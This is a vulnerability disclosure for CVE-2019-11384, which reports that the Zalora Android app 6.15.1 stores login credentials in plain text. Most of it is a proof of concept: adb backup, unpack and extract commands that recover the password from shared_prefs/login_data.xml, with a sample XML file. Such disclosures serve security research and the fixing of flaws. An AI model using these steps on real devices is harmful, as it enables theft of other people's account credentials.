CVE-2019-11384
Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11384
Author: Ender Phan
Description: The Zalora application 6.15.1 for Android stores confidential information insecurely on the system (i.e. plain text), which allows a non-root user to find out the username/password of a valid user via /data/data/com.zalora.android/shared_prefs/login_data.xml.
Exploit:
#Application: Zalora
#Platform: Android
#Version: 6.15.1 (latest)
#Severity: Medium
#Impact: Non-root user can read the password in clear text and log in to the application.

POC:
1. Back up the application data to the local PC:
   adb backup -f ~/zalora.ab -noapk com.zalora.android
2. Convert "zalora.ab" into a tar file (the file contains the backup data of com.zalora.android):
   java -jar abe.jar unpack ~/zalora.ab zalora.tar ""
3. Extract the tar file:
   tar -xvf zalora.tar
4. After the extraction, inspect the data in the directory apps/com.zalora.android/
5. Look for sensitive data. The password is stored in plain text in /shared_prefs/login_data.xml:
   <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
   <map>
   <string name="login_data">{"password":"P4ssw0rd123","email":"[email protected]"}</string>
   </map>